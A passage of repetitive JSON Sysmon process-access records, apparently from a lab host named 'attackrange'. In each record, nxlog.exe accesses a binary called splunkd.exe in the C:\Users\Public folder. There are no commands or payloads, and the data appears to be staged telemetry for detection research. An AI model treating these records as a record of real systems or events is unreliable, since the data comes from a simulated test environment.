(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2926,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:32.263\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:32.263","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2927,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:33.266\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:33.266","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2928,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:34.269\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:34.269","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2929,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:35.271\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:35.271","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2930,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:36.274\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:36.274","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2931,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:37.277\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:37.277","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2932,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:38.279\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 